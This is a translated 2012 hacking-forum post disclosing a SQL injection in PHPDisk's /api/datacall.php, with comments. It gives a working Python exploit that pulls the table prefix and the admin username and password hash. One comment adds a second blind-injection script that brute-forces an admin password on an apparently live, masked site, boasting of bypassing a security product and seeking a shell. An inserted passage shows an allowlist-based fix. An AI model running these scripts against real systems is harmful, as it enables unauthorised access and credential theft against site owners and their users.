phpdisk injection

2012-06-18 18:48:46 14 5319


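Version: not sure, but it works for me on both 6.5 and 6.0..
/api/datacall.php
No technical sophistication at all; this is purely to get everyone posting.
All that talk about Tusi being taken over by the Celestial Dynasty is just passing clouds.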
$type = trim(gpc('type','G',''));
$order = trim(gpc('order','G','')); // fetch the parameters
$by = trim(gpc('by','G',''));
$limit = (int)gpc('limit','G',0);

if(!$type || !$order || !$by || !$limit){
        echo 'PHPDisk Datacall Parameter is null or Error!';
        exit;
}
$filter_arr = array('select','delete','update','insert');
for($i=0;$i<count($filter_arr);$i++){
  if(strpos($order,strtolower($filter_arr[$i]))!==false){
    die('PHPDisk Datacall Parameter Error!');
  }
}

if($type=='user'){
        echo '<ul>'.LF;
        $q = $db->query("select username,userid from {$tpf}users order by $order $by limit $limit"); // you know what this means
        while ($rs = $db->fetch_array($q)) {
                echo '<li><a href="'.$settings['phpdisk_url'].urr("space","username=".rawurlencode($rs['username'])).'" target="_blank">'.$rs['username'].'</a></li>'.LF;
        }
        echo '</ul>'.LF;
        $db->free($q);

exp:
#!/usr/bin/python
#coding=utf-8
import urllib
import sys
def qz(url):
        fp=urllib.urlopen(url+"//api/datacall.php?type=user&order=12'&by=and 1=1&limit=1")
        data=fp.read()
        return data.split("select username,userid from ")[1].split("_users ")[0]

#print qz("http://127.0.0.1/www/disk/")

if len(sys.argv) !=1:
        host=sys.argv[1]
        qz=qz(host)
        fp=urllib.urlopen(host+"//api/datacall.php?type=user&order=1%20and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x27,0x7e,"+qz+"_users.username,0x27,0x7e,"+qz+"_users.password,0x27,0x7e)%20from%20"+qz+"_users%20where%20userid=1%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23"+"&by=and 1=1&limit=1")
        data=fp.read()
        #print data
        try:
                print "[*]Username: "+data.split("'~")[1]
                print "[*]Password: "+data.split("'~")[2]
        except:
                print "[#]Error!"
else:
                print "[#]Usage Exp.py http://127.0.0.1"

About the author

Cond0r: 136 posts, 1277 replies
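
A hardened form of the `type=user` branch quoted in the post, as an added example that is not part of the original post and not PHPDisk's own code: `order` and `by` are matched against exact allowlists, so only an allowlisted constant and a validated integer are ever placed in the SQL text. The function names, the sortable-column list, the limit cap and the `pd_` table prefix are assumptions.

```php
<?php
// Added example, not PHPDisk code. The function names, the sortable-column
// list, the limit cap and the 'pd_' prefix are assumptions for illustration.

const SORT_COLUMNS = ['userid', 'username'];  // columns the query selects
const SORT_DIRS    = ['asc', 'desc'];
const MAX_LIMIT    = 50;                      // assumed upper bound

// Return the allowlisted constant equal to the request value, or null.
// Non-string input (e.g. order[]=x) is rejected instead of being cast.
function pick_allowed($value, array $allowed): ?string
{
    if (!is_string($value)) {
        return null;
    }
    $i = array_search(strtolower(trim($value)), $allowed, true);
    return $i === false ? null : $allowed[$i];
}

// Build the type=user query, or return null when any parameter is invalid.
function build_user_list_sql(string $tpf, array $get): ?string
{
    $order = pick_allowed($get['order'] ?? null, SORT_COLUMNS);
    $by    = pick_allowed($get['by'] ?? null, SORT_DIRS);
    $limit = filter_var($get['limit'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => MAX_LIMIT]]);
    if ($order === null || $by === null || $limit === false) {
        return null;
    }
    // Only allowlist constants and a validated integer reach the SQL text.
    return "select username,userid from {$tpf}users order by `{$order}` {$by} limit {$limit}";
}

// Constructed requests: one valid, the probe values shown in the post,
// and a limit above the cap.
$samples = [
    ['order' => 'userid', 'by' => 'desc', 'limit' => '10'],
    ['order' => "12'", 'by' => 'and 1=1', 'limit' => '1'],
    ['order' => 'username', 'by' => 'asc', 'limit' => '100000'],
];
foreach ($samples as $get) {
    $sql = build_user_list_sql('pd_', $get);
    // Fail with a fixed message; never echo the SQL text or a database error.
    echo $sql ?? 'PHPDisk Datacall Parameter Error!', PHP_EOL;
}
```

The script in the post reads the table prefix out of query text returned in the response, so database errors should be logged server-side rather than sent to the client.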

14 comments

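  • #14
    2013-7-6 10:02

    But there's GPC... can't get around it.

  • #13
    2012-7-25 02:20

    The experts who dig up vulnerabilities are something else, I bow down~

  • #12
    2012-7-23 10:46

    Little Yueyue has started digging up vulnerabilities too...

  • #11
    2012-7-19 00:52

    Experts everywhere.

  • #10
    2012-7-13 10:38

    Written with real swagger. Hope everyone posts more.

  • #9
    2012-7-12 12:52

    Let me disclose one too. It's written rather crudely: /account.php has a blind injection. Slowly run out the admin's password. It also gets around SafeDog along the way. Getting a shell from the admin panel? Didn't succeed; the target site's permissions are locked down pretty tight. No execute permission. Anyone who can help can PM me.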

    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    #
    #  untitled.py
    #
    #  Copyright 2012 lee <lee@ubuntu>
    #
    #  This program is free software; you can redistribute it and/or modify
    #  it under the terms of the GNU General Public License as published by
    #  the Free Software Foundation; either version 2 of the License, or
    #  (at your option) any later version.
    #
    #  This program is distributed in the hope that it will be useful,
    #  but WITHOUT ANY WARRANTY; without even the implied warranty of
    #  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    #  GNU General Public License for more details.
    #
    #  You should have received a copy of the GNU General Public License
    #  along with this program; if not, write to the Free Software
    #  Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
    #  MA 02110-1301, USA.
    #
    #

    import httplib2
    import urllib
    import time

    a=[]
    urlstr = 'http://www.*****.com/account.php?action=adminlogin&ref=/admincp.php'
    h = httplib2.Http('.cache')
    headers = {'Cookie': '123123' ,'Content-type': 'application/x-www-form-urlencoded'}

    for l in range(1,33):
            for ASCII in range(0,129):
                    data="action=adminlogin&task=adminlogin&ref=%2Fadmincp.php&formhash=f0de1944&username=admin%27and/**/ascii(substring(password,"+str(l)+",1))="+str(ASCII)+"/**/and/**/'1'='1&password=666&loginsubmit=true"
                    #print data
                    response,content = h.request(urlstr, 'POST', data, headers=headers)
                    if content.find("该用户名未注册")<0:
                            if content.find("频繁")>0:
                                    print '1'
                                    l=l
                                    time.sleep(65)
                            print l,ASCII
                            a.append(ASCII)
                            print a

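  • #8
    2012-6-18 21:12

    That kind of wording doesn't belong in the exp's failure message. On success you could still show some swagger. So I'm docking the OP one gold coin for now.

  • #7
    2012-6-18 18:58

    Changed it. Quick, add it back for me; JB don't come easy..

  • #6
    2012-6-18 18:56
  • #5
    2012-6-18 18:56

    That really is bold. That said, it's better to be a bit polite when you speak; just don't have things like fuck in there.

  • #4
    2012-6-18 18:56

    fuck, I gave you 5 JB and you go and dock me instead. Just you wait..

  • #3
    2012-6-18 18:54
  • #2
    2012-6-18 18:53

    fuckyou, last time Yezi or somebody told me to write it that way, told me to write it with more swagger. I just reused that one and forgot to change it.. Quick, give me points.

  • #1
    2012-6-18 18:50

    "Screw you, it failed, didn't it!" I think writing this kind of vulgar language in an exp is really inappropriate. I hope the admins ban the OP's account.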